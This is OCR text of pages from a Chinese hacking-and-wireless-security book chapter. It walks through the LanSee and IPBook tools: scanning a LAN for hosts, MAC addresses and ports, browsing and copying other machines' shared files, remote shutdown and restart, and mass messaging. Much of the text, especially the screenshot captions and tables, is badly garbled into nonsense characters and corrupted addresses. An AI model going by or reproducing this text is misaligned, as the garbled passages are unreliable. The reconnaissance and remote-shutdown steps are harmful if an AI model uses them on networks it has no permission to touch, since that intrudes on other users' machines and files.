咯 公 司 员工 尾 务 汇 扎 192 168.0 1[8 -i W192. 168.1 | 设 瑟 _ 作 务 _ 查 吾 V】 得 件 _ 知 助 0 
中 和 公司 打 E[ 噶 lt392 166.0 106 Dd eoBa BfFanfaTet 0 E49E YA192. 166.1 EY | | (和 加 二 相当 朵 


可 ?dalmzgsbdsosssosTfe6aslEhd... 
可 smze4fg-9-3come5o5993150... 


"\192. 166. | 
V192.166.| Y 


本 选 项 工具 呈 示 | 任务 浏览 结 率 任 分 | 组件 千 理 更 新 升级 | ”把 出 


文 忻 夫 踢 径 


共享 名 称 


共 守 肘 同 


局 用 菩 明 开 牛 


就 法 


[step 加 如 果 想 与 某 个 主机 建立 连接 ， 在 搜 
索 到 的 主机 列表 中 右 击 该 主机 ， 在 弹出 的 
快捷 菜单 中 选择 “打开 计算 机 ”选项 ， 即 
可 打开 “Windows 安 全 ”对 话 框 ， 在 其 中 
输入 该 主机 的 用 户 名 和 密码 后 ， 单 击 “ 确 
定 ” 按 钮 才 可 以 与 该 按钮 建立 连接 ， 如 下 
图 所 示 。 


Windows 安全 xX 


要 行 活 竺 次 =3. 苞 告 任务 数 =0 


当前 瘟 口 ; 搜索 计算 机 本 机 全 你 ; DESKTOP-67NQBIF， 


共 紊 时间 | 无 [有 刚 | 添加 共 京 |， 锯 用 由 朋 
J 光 口 任 劳 ~ 
i 所 ey 

坟 理 和 证 二 


技 
当前 窗口 ; 


16:® TT 
[16:09:08] 记 
[16:09 引 
[16:04:51] 
[16:04 汉 


执行 线 生 吹 =32, 竺 待 任务 数 =158 


LarS aa 空间 


| 就 洁 


单 击 “ 共 享 目录 ”文本 框 后 的 浏览 按 
钮 ， 即 可 打开 “浏览 文件 夹 ” 对 话 框 ， 如 
下 图 所 示 。 


设 理 共 三 资源 。” 本 机 名 你; DESKTOP-67NQBIF， 


浏览 文件 夫 xX 
输入 网 络 凭 握 请 选择 文件 夫 
思 入 你 的 凭据 以 连接 到 :192.168.0.107 
Y 六 软件 (D;:) ~ 


| | 360Downloads 
| 360 安 全 浏览 器 下 载 
| | AdobephotoshopCC16 32 
8 DESKTOP-OAI361P 
EE | | EasyBCD v2.2.0.182 
- [FLHS GHOST Win7_Sp1 X86 v2014 01(32 
[ Ghost Win10 pro X32 10586 29 
| | Office 2016 
局 Program Files 
| | QMDownload 
_， 字体 库 v 


域 : DESKTOP-67NQBIF 
口 记 住 我 的 凭据 
人 @ 月 广 名 或 过 码 不 正确 . 


step 图 在 “搜索 工具 ”栏目 下 单 击 “ 主 机 巡 
测 ”按钮 ， 即 可 打开 “主机 巡 测 ”窗口 ， 
此 时 可 搜索 出 在 线 的 主机 ， 在 其 中 即 可 看 
到 在 线 主机 的 IP 地 址 、MAC 地 址 、 最 近 扫 
描 时 间 等 信息 ， 如 下 图 所 示 。 


二 后 规 网 半 志 工具 (LanSee) V1.72[ 未 注册 ] 一 口 x* 


在 其 中 选择 需要 设置 为 共享 文件 的 文 
yy 单 击 “确定 ”按钮 ， 即 可 在 “ 设 
置 共 享 资 源 ” 窗 口中 看 到 添加 的 共享 文件 
夹 ， 如 下 图 所 示 。 


岛 后 坛 网 查 石 工具 Lansee) V1.72[ 未 注 由] - D x 
设 宇 医务” 冶 二 [Vj 汝 位 ”各 助 (H) epee 
多 Ee 4 | 目 & 委 纪 程 著 | 到 ”~ | 癌 志 - | 二 一 
任 径 浏览 按 示 任务 | 担 件 答 到 更 新 升级 | 运 出 , Mke 9 攻 Ns 三 电 3 EE :着 E 数 于 ”~ PE 


工 员 选项 工具 号 示 | 


工具 未 项 工具 三 示 | 任 全 浏览 培 素 任务 ， 泪 件 管 至 吏 新 升级 。 ”这 中 

王 址 : Wt 这 拉毛 用 地 沉 丰 站 

a ep OO i 热 安县 共享 各 称 廊 件 玉生 ## 训 时 间 

192. ]68.0.] P4.83.CD. 33. 60. 73 11-08-1# 15:06:[0 ee 
.二 168.0 .104 00.1R.ac AD.13.5F 17-08-t4 16:06:10 子 体 床 了 \ 字 广 库 无 限 寞 
六 132.153 0 1 00.23.24.19.56.15 11-08-Ll4 16:06:10 
请 32.155 0112 cs.6.00.9c.mD 11-08-14 16:06:10 

192. 168.0.] 吧 34.3E.52.36.1T.01 171-08-l4 16:06:10 

192. 168.0. [5 EO.mM CO CO.1A SD 17-09-134 16:06:10 

92. 166.0 100 A4.5E.60. 16.7A A 17-06-!4 16:06:10 
[Ea i1eS 0 10s 40. JE EF DH. AS D3 17-08-14 16:D06 10 
请!32.153.0 107 656.78.34.76.56.10 17-08-Ll4 16:06:10 
闭 132.155 0 114 co.ch.38. 10.M.0E 7-08-14 16:06:1] 

l92.163.0.13 68.78.75.EA.EC.IA 11-08-l4 16:06:1] 

192. 168.0.10] 和 .3DL. D3.48. TB 17-08-134 16:06:12 
下 |1s | is## 字 总 际 在 线 主机 数 =12 最 大 时 =12 商用 员 明 不止 共 友 目录 了 .字体 库 ， # 碍 无 咒 抽 汪 如 共享 。 使 用 说 明 
[16.02.50 DT TT6: 各 : 习 T 语 当 了 814 个 科 氨 党 口 什 甘 
中 03.08 i :ph A 0 7 本 4 下 采 往 党 口 作秀 
18:09:44 和 0 

EE 3 个 失守 岂 拓 
[8.04 33] 扩 如 闪 季 安插 反 未 到 5m 个 其 于 叉 忻 
Lars as 空 目 
执行 堵 和 次 =32, 笠 待 任 务 数 =50 当前 瘟 口 ; 主机 遂 测 本 机 全 你 ; DESKTOP-67NQBIF ， 寺前 厂 口 ; 议 营 共享 资源 相机 富家 : DESKTOP-67NQBIF ,本 + 


在 “局 域 网 查看 工具 ”窗口 中 还 可 
以 进行 文件 复制 操作 ， 单 击 “ 搜 索 工具 ” 
栏目 下 的 “搜索 计算 机 ”按钮 ， 即 可 打开 
“搜索 计算 机 ”窗口 ， 在 其 中 即 可 看 到 前 
面 添 加 的 共享 文件 夹 ， 如 下 图 所 示 。 


碳 后 戏 网 二 去 工具 (LanSee) V1.72[ 未 注册 ] 一 口 x 
设 豆 性 务 音 五 IV] 给 件 ” 知 助 (H) 
1 区 也 ax 部 如 人 多 EE 线程 雪 | 允 “| 确定 
| 工 呈 选项 工具 号 示 | 任务 浏览 结束 任务 | 扼 件 各 至 更 新 升 圾 | 。 遂 出 
亚 雪 址 计 站 机 匈 工作 坦 MOE 十 址 用 户 名 jy 
L32158.0. 114 OIG-702l1l22l WESEOUP Co. CB. 38. rh. MW. OE 
92. 158.0. 107 IESHIOF LSEFISE -WRESEOU? 58. 76.34. 78. 53. 10 
192. 168. 0. 100 让 .5E 60.16 7A 村 
192. 166.0 101 A4. 44 D1. 1093.48. 76 
讽 132. 153.0. 106 EO. DD. CO.00. LA 560 
< > 
共 京 次 产 所 在 的 计算 机 共 京 立 件 所 在 的 月 示 六 
喇 公 司 员工 尾 务 汇总 192 168.0 1[8 
到 芭 司 打 E[ 串 t92 166.0 .108 [J yey 打开 文件 
引 !159d2-? 3 
梭 4meaed 打开 文 忻 所 在 的 文 忻 去 
y < 丢 捉 玉 件 
已 拱 二 院 述 站 享 注 太 乌 用 说 明 | 开始 | 
16:0371 00] 得 妆 任 去 季节 ! 用 户 未 过 访问 招 ; 求 旋 吕 】 
E16: 10 强 3 是 国信 不 汪 月 于 二 
[16:13 二 让 了 [| 者 3 扫 区 口 任 芝 
时 134:02] I 汗 了 31| 扫 撑 洒 口 性 六 
5.14:07] | 注 了 3 中 扫 撞 3 口 任 芳 
YY 


杭 行 场 径 欢 =32, 竺 待 任务 数 =53 当前 瘟 口 ， 搜索 计算 机 本 机 全 爷 ; DESKTOP-67NQBIF， 


在 “共享 文件 ”列表 中 右 击 需要 复制 
的 文件 ， 在 弹出 的 快捷 菜单 中 选择 “复制 
文件 ”菜单 命令 ， 即 可 打开 “建立 新 的 复 
制 任务 ”对 话 框 ， 如 下 图 所 示 。 


| 嫩 立 新 的 复 麟 任务 XxX 
原文 忻 另存 名 称 
Jara Web 整 请 开发 实战 .Javas Wet 束 育 开 发 实战 . 


Ss 

育 定 取消 

设置 存储 目录 并 选中 “立即 开始 ” 复 
选 框 后 ， 单 击 “ 确 定 ” 按 钮 即 可 开始 复制 
选 定 的 文件 。 此 时 单 击 “ 管 理工 具 ” 栏 目 
下 的 “复制 文件 ”按钮 ， 即 可 打开 “复制 
文件 ”窗口 ， 在 其 中 即 可 看 到 刚才 复制 的 
文件 ， 如 下 图 所 示 。 

| 同 月 埠 网 坦 厨 工兵 [LanSes) V1.72[ 未 注册] - ODO x 


二 


物 有 和 | 日 全 & 


| 工 只 远 贡 工具 显示 | 仔 甸 浏览 屿 至 位 务 | 妃 件 苔 汉 更 新 升 季 巡 出 


立 件 来 源 | 网 上 邻居 


闭 程 元 32 。 ~ 确定 


| 


车 :的 :00] 性 字 支 件 赤 天 郧 Es: 
口 
口 


EE 10: | A 
16:13:23 Jo 汪 浊 
[18:14:02] ’ 
[18 14:07] "下 1 扫 搞 


执行 法 他 数 =1, 苇 和 罕 任 务 数 =0 当前 窗口 ; 撮 寺 文件 本 机 匀称 : DESKTOP-67NQBIF， 


第 14 章 ”无线 局 域 网 的 安全 防护 


[step 图 在 “网 络 信息 ”栏目 下 可 以 查看 无 
ya 
击 “ 活 动 端口 ”按钮 后 ， 在 打开 的 “活动 
端口 ”窗口 中 单 击 “ 刷 新 ”按钮 ， 即 可 
看 到 所 有 主机 中 正在 活动 的 端口 ， 如 下 图 
所 示 。 


畏 与 斌 网 童 五 工 只 (LanSee) V1.72[ 直 注册 ] 本 x 
设置 ”性 务 ”到 天 [V) 组 仁 ” 关 助 (H] 
家 如 和 | 日 全 | 和 片 @ 扫 了 | 让 宇 
工具 篷 项 工兵 于 示 | 位 全 浏览 千 率 性 务 | 担 件 管 深 更 新 升级 | 运 出 
苏 i 进程 本 地 地 址 本 二 浓 口 远程 地 址 远程 消 口 
SBTC? CC:\Froeran Files\Com 00.0.0 ED 0000 0 
?FT unmowa 0.0.0.0 135 0.0.00 D 
SICP unknorn 0000 445 0000 0 
SIC? CC:WDCCMEIWIINN... 0.0.0.0 3327 0.0.0.0 0 
II? unknor 127 0 0.1 102B 0000 0 
BIL? wm 192. 158.0.5 138 0.0.0.0 0 
SP CC:\Frogran FiloshSt 192 1p6.0.6 1065 221. 256. 2T. 152 ED 
BIL? CC:\Frogran Files\Thon 192 1E8.0.6 94692 121 10 120 LT4 5S5T7 
EU? wm 0.0.0.0 d45 
Su? CCC: MINON\ yt or 0.0.0.0 S00 
BP  c:\Eroeran Files\Com... 0.0.0.0 1004 
SRP CC:\Frogran Filor\Stor 0.0.0.0 103 
Sn7 CC:\Progran PilesvStor 0.0.0.0 1050 和 
刷 训 
[16.0.33] 创 永 了 8314 个 扫描 周口 攻克 
执行 线程 笋 =0 等 每 任务 获 =0 当前 管 口 : 渍 动 浇 口 本 机 和 名称 : DESKTOP-67NQBIF , 本 


如 果 想 了 解 计算 机 的 网 络 适 配器 信 

息 ， 则 需 单 击 “ 适 配器 信息 ”按钮 ， 即 可 

edhe 
器 的 详细 信息 ， 如 下 图 所 示 。 


壤 后 规 网 半 志 工具 (LanSee) V1.72[ 未 注册 ] 一 口 
设 坪 ”性 备 吝 厂 [IV] 旺 仁 与 有 妈 (H) 
和 De 人 @ | 去 

工具 选项 工具 号 示 | 任 各 浏览 结 率 任务 | 得 件 等 理 更 新 升级 | 运 出 
名 称 ; ES hi RgBIF 
1: 192.1 

5 0 17: 3 i 1 
&abit evaet LO7op7l0005aze-I Controller 


DrE: "1 1 0 1 


EY EC 


[16.01.18 qd 个 扫把 如 
二 个 扫 拘 吉 营 
65:02.50] 有 | 谴 了 Ci 扫 招 2 
[i 9.08] 症 尘 了 254- 丫 扫 宁 计算 机 任务 
[16:03:44] 怒 牢 ， 共 J 
[16:04:51] 控 市 共 他 山椒 症 素 ， 共 区 站 
本 村 企 你 ; DESKTOP-67NQBIF， 


利用 “局 域 网 查看 工具 ”还 可 以 对 
远程 主机 进行 远程 关机 和 重启 操作 。 单 击 
“管理 工具 ”栏目 下 的 “远程 关机 ” 按 
钮 ， 即 可 打开 “远程 关机 ”窗口 ， 并 单 去 
“导入 计算 机 ”按钮 ， 即 可 导入 整个 局 域 
网 中 所 有 的 主机 ， 选 中 主机 前 面 的 复 选 杠 
后 ， 单 击 “ 远 程 关 机 ”按钮 和 “远程 重 
启 ” 按 钮 即 可 分 别 完 成 关闭 和 重启 远程 计 
算 机 的 操作 ， 如 下 图 所 示 。 
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黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


向 后 减 网 吉 专 工具 (Lansee] V1.72[ 未 注册 ] 一 口 x 
设 吾 ” 萎 务 ” 音 百 [ 山 组 什 务 助 (H) 
- 物 区 | 和 晤 目 合 | 办 


刁 先 项 工具 三 示 任务 剂 遍 结束 任务 | 扼 件 各 至 更 新 升级 | ”进出 


计算 机 名 本 访 藻 注 
] 姓 !sc.16.0.1 
I 153.0. 1[4 


ltS2 188.0 106 
全 人 166.0 1 人 2 
多 12. 1 后.0. 1 
Ls2. 158.0 114 

口 马 152 169.0 107 
村 1E6 0 i100 

| 坊 !32. 165.0.1C! 

] 旺 se. 183.0. 5 


功用 说 四 写 \ 计 其 机 | 运程 关机 | 运程 重启 


[C16:13:23] & 
[16:134:02] 忆 
el 30 


Hk Tf 
》 


区 定 的 育 求 信息 ] 
1 允 Strots 2+Hibernate4SpringlTI7) DdE 太 让 计 厂 


LarSaa 空 日 


就 洁 


槐 行 堵 怪 次 =32, 葡 竺 任务 数 =157 当前 益 口 ; 远 租 关机 


利用 “局 域 网 rp 还 可 以 给 指定 

的 主机 发 送 消息 。 单 击 “ 管 理工 具 ” 栏 目下 的 

“发 送 消息 ”按钮 ， ee “发 送 消息 ” 窗 
ee 

个 无 线 局 域 网 中 所 有 的 主机 ， 如 下 图 所 示 。 

塘 后 项 网 训 去 工 只 (LanSee) V1.72[ 未 注册 ] 口 we 


设 受 性 务 ” 音 百 [ 山 外 件 ” 知 助 (H) 
泊 人 | 肛 晤 


本 机 全 你 ; DESKTOP-67NQBIF， 


目 鲸 入 线程 救 | 敢 。v| 确定 


工 呈 法 项 工具 号 示 | 任务 浏 党 结束 任务 | 抑 件 各 至 更 新 和 组 | “退出 
芷 韦 站 发 闫 状态 于 注 A 
| 这.158.0.1 
| 亡 3. 158.0.104 
口 壤 tsz 168.0 1% 
口 常 !32 166.0.412 


| 沪 !32. 156.0. 10 
| 记 152.155.0.114 
口 沪 1% 11688.0 10 
口 常 !32 166.0 10 


1 oo 1F8 nN 1r1 a 


世 用 说 胃 导入 计 其 机 宏光 


[016:13:23] & 健 了 0 站 扫 氨 沁 口 f 
[16:134:02] 区 3 ED 
[16:14:07] 区 di 汉口 
[16:19:25] 替 室 妇 件 类 尘 败 (用 
[16:19:26] wf Java 站 中 副 合 开发 


ey 的 党 下 信息， 


trnts 2+Hibhernate4SprinclFI7) pdfEY 计 碗 


LarS aa 空间 


问 洁 机 行 场 枉 钦 =32, 等 待 任务 数 =53 


选择 要 发 送 消息 的 主机 后 ， 在 “发 送 
二 文本 区 城中 输入 要 发 送 的 消 和 上 息 ， 然 
后 单 击 “发 送 ” 按 钮 ， 即 可 将 这 条 消息 发 
送 给 指定 的 用 户 ， 此 时 即 可 看 到 该 主机 的 
发 送 状态 是 正在 发 送 ， 如 下 图 所 示 。 

加 后 减 网 半 专 工具 (Lansee) V1.72[ 未 注册 ] — 口 x% 


设 豆 ” 女 务 ”总 事 [ 山 泪 件 男 助 (H) 


和 了 人 | 如 二 


工 只 选项 工具 豆 示 


当前 窗口 ; 发 送 消 肪 本 机 全 你 ; DESKTOP-67NQBIF， 


目 舍 | 加 六 得 炒 | 绝 ”| 确 直 


任务 测 莒 续 率 任务 | 担 件 答 理 更 新 升级 | 运 出 
王 地 址 发 二 状态 


口 坟 ts 18.01 
口 镶 lse 166.0 104 
| 访 132. 158.0. 156 
] 盟 se.165.0.112 
习 肯 se. 165.0. 10 正在 居 迹 
口 雯 tsz 168.0 .11 
口 塘 !sz 158 0 457 
口 起 !'20 188.0 im 
1 10 1F8n 1r1 Y 


tf! 


迟 挤 】 
SE Tnate4SpringlPn7) pydE 下 直上 计 成 


LarS aa 空 日 


就 洁 槐 行 堵 往 次 =32, 葡 竺 任务 数 =158 当 汕 窗口 ;发送 消 筷 


step 图 选择 “聊天 工具 ”栏目 ， 在 其 中 既 
可 与 无 线 局 域 网 中 用 户 进 行 聊天 ， 还 可 以 


本 机 全 你 ; DESKTOP-67NQBIF， 
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共享 无 线 局 域 网 中 的 文件 。 如 果 想 和 无 线 
局 域 网 中 用 户 聊 天 ， 则 需 单 击 “局 域 网 


聊天 ”按钮 ， 即 可 打开 “局 域 网 聊天 ” 窗 
口 ， 如 下 图 所 示 。 


回 后 项 网 训 厂 工 只 (LanSee) V1.72[ 未 注册 ] 一 口 x 
设 豆 性 务 ” 音 五 [V] 泪 伴 ”和 交 助 (H) 
车 ”也 多 


工兵 法 项 工具 三 示 


BB 人 办 线 查 歼 | 允 “了 | 确定 


任务 济世 结束 任务 | 所 件 知 至 于 新 升级 | ”退出 
用 户 


.nsETOT-ATIQEIT 


本 人 


了 3 
vd 用 有 信息 ) 

| J et Ei J 的 谢 求 信息 | 43pringiPI7) pdf 芭 由 法 碗 
了 1 


LarS aa 空 日 


就 尘 执行 声 乏 煞 = 32. 等 待 任务 数 =189 


step 图 在 下 图 的 “发 送信 息 ” 区 域 中 编辑 
ppp pe 息 后 ， 单 击 “ 发 送 ” 按 钮 ， 即 
可 将 该 消息 发 送出 去 ， 本 
天 ”窗口 中 即 可 看 到 发 送 的 消息 ， 该 模式 
比较 类 似 于 QQ 软件 ， 各 下 图 所 示 。 

莫 后 项 同 二 去 工具 (Lan5ee) V1.721 未 注册 ] = 蝇 党 


设 吾 ” 芋 务 ” 音 吾 [W 洽 位 ” 知 助 (H) 


物 区 | 和 和 | 目 提 | 加 


当前 窗口 ; 月 域 网 由 天 本 机 名 你 ; DESKTOP-67NQBIF， 


工 只 和 连 项 工具 三 示 | 任 惫 浏览 续 率 任务 | 让 件 管理 更 条 升级 | 运 出 
用 户 GTNQABIF 17-08-14 16:23:19 
刻 IESETOP-67HGBIT 


< > 3 
16:14.02] EI 汗 了 3 十 扫 氨 营口 任 邯 和 
Fi6:t 14:07] 户 小 ol 务 
[16:19:25] 痊 字 这 件 吉 坚 油 i 的 应 求 信 息 ) 
[16: 19:: 26] wi Jav 让 开发 a 23Hibernate4SpringclPD7) ndE 玉 让 这 
[16:: 13] 车 了 1 人 
Y 
LarS aa 空间 
就 洁 执行 二 行 灼 =0. 等 并 任务 数 =0 当前 窗口 ; 局 域 网 聊天 本 机 名 你 ; DESKTOP-67NQBIF， 


sep 图 单调 “文件 共享 ”按钮 ， 即 可 打开 “ 文 
rl 
制 文件 、 添 加 共享 等 操作 ， 如 下 图 所 示 。 


向 后 项 网 训 二 工具 (LanSee) V1.72[ 未 注册 ] 一 口 x 
设 芯 性 务 ” 吝 天 [Vj 洽 伴 ”和 关 助 (H) 


各 人 | 


工 只 先 价 工具 三 示 | 作 务 浏览 纺 率 任务 | 担 件 管理 更 新 升级 


用 户 共 字 廊 件 大 小 [EB) 共 字 者 


即 分 交 性 名 执 农 用户 共享。 县 外 议 件 


我 的 共 至 文件 文 忻 趾 径 太 小 [3) 


添加 共 宪 职 背 共 字 


he . 
He: 49.25] 玉 于 和 全 站 风光 的 将 下 信 展 |。sspwis ct) warReR 
[16:22:13] OD 
Lars oa 空间 
就 洁 要 行 法 生效 =32, 笠 待 任务 数 =21 当前 窗口 ; 文件 共享 本 村 全 你 ; DESKTOP-67NQBIF ， 


14.2.2 ”使 用 IPBook 工 具 


IPBook 〈 超 级 网 络 邻居 ) 是 一 球 小 巧 
的 搜索 共享 资源 及 FTP 共 享 的 工具 ， 软 件 自 
解压 后 就 能 直接 运行 。 它 还 有 许多 辅助 功 
能 ， 如 发 送 短信 等 ， 并 且 所 有 功能 不 限于 
无 线 局 域 网 ， 可 以 在 互联 网 使 用 ， 使 用 该 
工具 的 具体 操作 步骤 如 下 : 
双击 下 载 的 IPBook 应 用 程序 ， 打 开 
“IPBook (超级 网 络 邻 居 ) ” 主 窗 口 ， 在 
其 中 即 可 自动 显示 本 机 的 IP 地 址 和 计算 机 
名 ， 其 中 192.168.0.104 和 192.168.0 分 别 是 本 
机 的 IP 地 址 与 本 机 所 处 的 无 线 局 域 网 的 IP 范 
围 ， 如 下 图 所 示 。 


从 1PBock 正式 注册 板 (起 级 网 洛 急 后 ]} - 口 x 
HO IRm) 和 四 


je 图 |192. 163.0 

IE 地 址 152.165.0. 103 国 日 in ata 加 发 短信 | ”其 他 工具 ”| 
荣 口 ”|80;21; 135 ”加 探测 冰 口 | 回 太 苑 困 冰 口 持 东 
HE | -共享 尝 源 区 


所 拉 并 一 个 网 咎 | 息 点 验 夫 京 资源 | 给 太 范 围 搜捕 


计 g 机 名 | - 
Im DESKTOF-S?NDBIF WORKGROUP 001ESC.aD.13 5 


ofiUnkhOPP [wergi 
BO0 


IFBook (ER 后 局 作者 : ot ll 
前 再 闵 的 于 抽 询 的 大力 志 持 至 |PBo ok 二 区 2b 力 。 


INBSTAT Response From 192.168.0.104 狂 到 到 计算 机 宏 、 工 作 得 、MAC 拒 坦 特 。 


a 
re peppy 在 “IPBook (起 
级 网 络 令 后) ” 主 窗 口中 ， 单 击 “ 扫 描 一 
个 网 段 ” 按钮 ， 几 秒 钟 之 后 ， 本 机 所 在 的 
无 线 局 域 网 所 有 在 线 计算 机 的 详细 信息 将 
显示 在 左 侧 列表 框 中 ， 如 下 图 所 示 。 其 中 
包含 TP 地 址 、 计 算 机 名 、 工 作 组 、 信 使 等 


信息 。 


做 1PBock 正式 注册 板 (起 级 网 阁 急 后 ]} - 吕 x 


TP 地 址 i 
总 口 ”|80;21; 135 ”加 探 出 沫 口 | 串 太 花 妥 端 口 扫 和 | 


计算 机 区 


t 
.168. DESKTOF-SINOBIF ‘WORKGROUP 

恩 192.168.01 以 DESKTOP-SINDBIF WORKGROUP 
192.168.0 1C6 DESKTOPSCVENGI ‘WORKGEROUP 
Ee 107 DE5KTDPDSKF1sE ‘WOPkGROUP 
132.168.0108 网络 科技 WDRKERDUP 
转 132168.0112 AFOIG.611211054 WOPEGROUP 
恩 192.168.0114 AFOIG.702111221 WwWDRKGRDUP 


[015.2C.60.13.F 
[01E.8C.2D.13.9F 
[0232409B6E5 
58FB 84 FE.59 10 
各 上 后 EFDEA3D03 
[FE60.00 SLCL.D1 
COCB.38.70.a8.CE 


192.168.0253 不 在 位 
132.166.0254 不 在 垃 
所 计算 机 洗 ， 香 到 “个 计 站 机 所 hndsma=0UDPcounl=7 


第 14 章 ”无 线 局 域 网 的 安全 防护 全 


[sep 国 在 显示 出 所 有 计算 机 信息 后 ， 单 击 
“点 验 共 享 资源 ”按钮 ， 即 可 查 出 本 网 段 
右 侧 的 树 状 显示 框 中 ， 如 下 图 所 示 ， 在 搜 
索 之 前 还 可 以 设置 是 否 同 时 搜索 HTTP、 
FTP、 隐 藏 共 享 服务 等 


从 1PBock 正式 注册 炉 (起 级 网 治 邹 后 | 一 口 x 


hn 端口 [80;21;135 | 


| 计算 机 区 共 字 迪克 
| ti 


, MaC [王强 121 016 
1921600104 DESKTOPS7HDBIF -WORKGROUP [OE EC.AD.13 FF 字体 庄 
1 DE5KTDOFS7NDBIF ‘WORKGROUP mE scen13F | 已 加 1 0.106 了 
到 192168.0106 DESKTOPS5CYBNGI ‘WORKGROUP rm0232409B6E5 自 公司 品 工 任务 拒 所 
国 132188.0107? DESKTOPDRFISE ‘WORKGROUP 58FB .24 FE.53.10 -加 | 公司 打印 届 
加 132166.0106 网络 料 技 ‘WORKGAOUP 4025 EF.DE.A9 03 
i AFOIG -E11211054 WORKGRAOUP CBBD 00 3C.CC.D1 
加 1921680114 。 AFDIG-7nz11122 WORKGROUP cnc8.38 7D AB CE 


192.168. | 
rm nna P 庙 口 不 开 让 
‘W192 a Ot Ci 

192.168 六 T 口 不 开 Li 
1327188.08 站 31FTP 也 日 丰 并 吉 


| 正在 检 要 192.168.0.139 的 共享 资源 


在 IPBook 工 具 中 还 可 以 给 目标 网 
段 发 送 短 信 ， 在 “IPBook (超级 网 络 领 
居 ) ” 主 窗 口中 单 击 “短信 和 群发 ”按钮 ， 
即 可 打开 “短信 群发” 对话 框 ， 如 下 图 
所 示 。 


192.168.0 


三 群 疏 直 信 给 已 经 搜索 到 的 的 计算 机 


dear SI 
我 对 您 的 景仰 如 于 否 江 水 ,连绵 不 绝 。 
今 关 称 喷 干 扰 素 了 加 洒 伟 完了 辣子 不 要 乱 扔 ， 乱 扔 要 厦 到 小 朋 


友 的 。 
, 即 人 二 病 不 到 小 朋友 ， 磺 到 汐 鱼 也 不 好 啊 。 


kind reguard 
收 信人 : 傈 爱 的 先生 厂 自动 使 用 收 信者 的 信人 让 
发 送 人 : [您 的 仰 蔓 者 厂 自动 使 用 发 信者 的 信人 


[step 图 在 “计算 机 区 ”列表 中 选择 某 台 计 
算 机 ， 单 击 Ping 按 钮 ， 即 可 在 “IPBook 
(超级 网 络 邻 居 ) ” 主 窗 口 看 到 该 命令 的 
运行 结果 ， 如 下 图 所 示 。 根 据 得 到 的 信息 
来 判断 目标 计算 机 的 操作 系统 类 型 。 
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黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


后 IPBook 正式 注册 板 (总 源 网 洛 轨 居 ) 
文生 W) 工具 NY) 大 入 太 
扫描 | 歼 殷 库 | 光源 包 理 号 | 


1S1530.107 
1921630.109 
1S21630.112 
晶 1 科 1630114 


| 齐 口 “go:31;135 加 所 则 kD | 加 大 范 国 % 口 扫描 | 


DESKTDP.EFNDBIF 
DESKTDP.SCVBNGI 
DESKTOP.DSKF1 宛 
同乡 料 术 
gsFOIG-E11211054 
2FOIG-ne N21 


| rf 范围 |192. 168.0 全 撕 一 个 网 段 | 鳃 点 验 共享 资源 | 惟 大 示 天 燃 捕 | 加 短信 群 败 | 


下 地 址 [152. 16%. 0. 108 "| pirg | 了 btstat | 共享 | 加 发 措 信 | 其 他 I 县 


DRKGROUP 
WODRKGRDUP 
WORKGROUP 
WOREGRBOUP 
WORKEROUP 
WORKGROUP 


-一 一 -| [ 夫 可 当下 区 


弓 樟 132.168.0.104 rhs 
- 仿 | 字体 陈 
忆 - 加 192.166.0.103 
-全 公司 员工 仔 务 二 总 
筷 上 司 打印 机 


00.1F.8CAD.13. 
00.23 下 03.961 
58.F8.84.FB.58.… 
40A5EF DE AI 
Cagnmm.c.cc. 
DICE Se DE. 


从 1PBock 正式 注 这 版 (起 级 网 挫 邻 基 ] 


文人 手 W) 工具 VY] 


点 名 加 


扫描。 | 8 诛 | 资 珠 筷 理 器 | 


IP 荧 围 「192. 168.0 总 扫描 一 个 网 中 | 筷 点 验 闪 享 党 源 | 各 大 基于 朱 捕 | 到 坛 信和 群 点 


IP 地 址 [132. 158.0.104 ~ Firg | mbtstat az> 共 享 | 四 发 短信 | 其 籽 工 具 
座 口 [0:21;135 ”加 探 册 风口 加 大 范围 染 口 扫描 | 


1921680108 
1S1680.10 


RESPONSE Lersth=175 recy hem 192.1680U104 

DESKTOPS7NGBIF <+00><UNIDUE;4 
REGROUP D0 GBOUP>HS 

DESKTOPS7NGBIF <20><UNIDUES4 
RKGPRDUP 1Ey<GROUP>S4 


后 壮 共 了 资源 侍 为 过 束 。 


在 计算 机 区 列表 中 选择 某 台 计算 机 ， 
单 击 Nbtstat 按 钮 ， 即 可 在 “IPBook (超级 
网 络 邻 居 ) ” 主 窗 口 看 到 该 主机 的 计算 机 
名 称 ， 如 下 图 所 示 。 


性 IPBook 正式 注 船 怀 ( 超 拓 网 放 邻 居 ) 一 口 x 
文 煌 W) 工具 NY) 大 贡 态 
扫描 。 | 将 招 陈 | 怒 源 管理 路 | 


| 亚 苑 围 92. 168.0 和 饼 撒 一 个 网 段 | 总 点 验 共 享 资 源 | 鸭 大 知 和 型 & 捕 | 加 短信 辞 央 


匡 地 址 1192. 168.0. 108 | pire Rbtstat | ss 共享 加 次 拭 信 | 其 他 工 且 
| 朝 口 [go:21;135 加 所 贱 WD | 加 大 范 转轴 口 扫描 | 


-共享 这 下 区 一 一 一 一 一 
^ | [日 - 强 132. 160.0.104 [DBSETO 
D0023240388 | - 仿 | 字体 诬 
犁 - 眩 1 吕 . 188.0.103 
-网 公司 员工 任务 二 间 
转世 司 打印 机 


DESKTDP.5CVBNGL DRKGRDUP 
DESKTDP.DSKF1SE 。 wDRKGRDUP 
网 纪 科 村 WOAKGROUP 
aFDIG.6I12I1064 WODRKGROUP 
sFOIG-7EE2111221 WODRKGROUP 


598.F9.84.FB.59.- 
40A5EF.DE A3. 
C36000.3C.C0. 
口 CB 性 开 站 
121630.108 
13921680108 
1S168.0.10 
1 反 1680108 
1321680.108 
4 


ORKGROUP 
WORKGRDOUP 


*40 A5EF DE AI 
40A5EFDEA3 ™ 
》 


REGROUP <00><GROUP>04 
叶枝 <20><UNIDUES# 
REGROUP 1E> GPOUP>S4 
WAC Pdese=t0 5 EF.DE FAI DI 
6roup-WDRKGRDUP Heat 科技。 ShaNamavp 操 科技 


. Maesangel= 


NBSTAT Response From 192.168.0.108 得 到 只 计 引 机 各、 工作 汽 、MAC 地 址 等 ， 


[step 园 单 去 “共享 ”按钮 ， 即 可 对 指定 的 网 
络 段 的 主机 进行 扫描 ， 并 把 扫描 到 的 共享 
资源 显示 出 来 ， 如 下 图 所 示 。 


灼 IPgook 正式 注 各 版 ( 超 氢 网 记分 居 ) 一 口 x 
文 4HW) 工具 IY) 页 风 加 ) 
扫描 。 | 就 捉 折 | 订 叉 宕 理 芝 | 
